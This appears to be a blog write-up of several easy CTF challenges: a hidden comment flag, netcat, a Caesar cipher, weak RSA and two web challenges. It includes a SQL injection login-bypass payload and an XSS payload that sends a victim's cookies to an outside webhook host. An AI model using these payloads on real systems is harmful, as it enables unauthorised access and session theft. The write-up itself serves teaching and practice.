Managed to find some time to grab the low-hanging fruit on this CTF:
web/inspect-me
Exactly what it says on the tin. Inspect the source code; the flag is in a comment.
flag{inspect_me_like_123}
misc/compliance-lattice-feline
Another free flag – you simply need to connect to the challenge
nc mc.ax 31443
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
crypto/scissor
I was given this string and told something about scissors
egddagzp_ftue_rxms_iuft_rxms_radymf
“scissor” sounds like Caesar, so it’s likely to be a Caesar cipher.
Using the Boxentriq code-breaking tools we get:
surround_this_flag_with_flag_format
So the flag is:
flag{surround_this_flag_with_flag_format}
web/orm-bad
The challenge presented a basic username/password web application.
Simple SQLi –
username: admin
password: ' or 1=1;
flag{sqli_overused_again_0b4f6}
The following two challenges were my “learners” where I discovered new tools and solved (albeit basic) challenges I had struggled with before.
crypto/baby
Given the following data and a hint that it relates to weak RSA implementation:
n: 228430203128652625114739053365339856393
e: 65537
c: 126721104148692049427127809839057445790
I learned that n is a function of factors p and q; once you know p and q, automated solving can be simple.
Check to see if the factors of n are “known” on FactorDB.
They are: p = 12546190522253739887, q = 18207136478875858439
We can now try using RsaCtfTool to solve:
./RsaCtfTool.py --uncipher 126721104148692049427127809839057445790 -p 12546190522253739887 -q 18207136478875858439 -e 65537
flag{68ab82df34}
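What the RsaCtfTool call above does once p and q are known, written out as an added example (not part of the original write-up and not RsaCtfTool's own code). It uses the n, e, c, p and q given above, assumes unpadded textbook RSA, and the function names are illustrative.

```python
# Added example: textbook RSA decryption once the factors of n are known.
# Numbers are the ones given in the write-up; function names are illustrative.
from math import gcd

N = 228430203128652625114739053365339856393
E = 65537
C = 126721104148692049427127809839057445790
P = 12546190522253739887  # factors reported by FactorDB in the write-up
Q = 18207136478875858439


def private_exponent(p: int, q: int, e: int) -> int:
    """Derive d from the factors: d = e^-1 mod (p-1)(q-1)."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def decrypt(n: int, e: int, c: int, p: int, q: int) -> bytes:
    """Recover the plaintext bytes of c under the public key (n, e)."""
    if p * q != n:
        raise ValueError("p * q does not equal n")
    if not 0 <= c < n:
        raise ValueError("ciphertext out of range")
    d = private_exponent(p, q, e)
    m = pow(c, d, n)
    # Re-encrypting must give back c; this catches wrong factors or exponent.
    if pow(m, e, n) != c:
        raise ValueError("round-trip check failed")
    # Assumption: no padding, so the integer is the message in big-endian bytes.
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # A 128-bit modulus is far below the 2048 bits used for real keys,
    # which is why its factors are already in a public database.
    print(f"modulus size: {N.bit_length()} bits")
    print(decrypt(N, E, C, P, Q).decode())
```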
web/pastebin-1
We are presented with two web applications:
The first, a basic pastebin which accepts input and then redirects to the newly generated paste.
The second, an “AdminBot”, which suggests the admin will visit the URL that is provided as input.
So this appeared to be an XSS challenge to create a paste that will cause AdminBot to spill secret data.
Testing that theory, the first paste is:
<script>alert(1)</script>
Sure enough, when we submit the paste and redirect, we get an alert so the page is vulnerable to XSS.
We then need to set up a webhook – I use this site.
We then try to steal cookies using XSS by pasting the following:
<script>window.open('https://webhook.site/******/'.concat(document.cookie))</script>
This generates a URL for our paste which we feed to AdminBot – we get the flag as a GET request on our webhook:
https://webhook.site/******/flag=flag%7Bd1dn7_n33d_70_b3_1n_ru57%7D
URL-decoding the percent-encoded braces (%7B and %7D):
flag{d1dn7_n33d_70_b3_1n_ru57}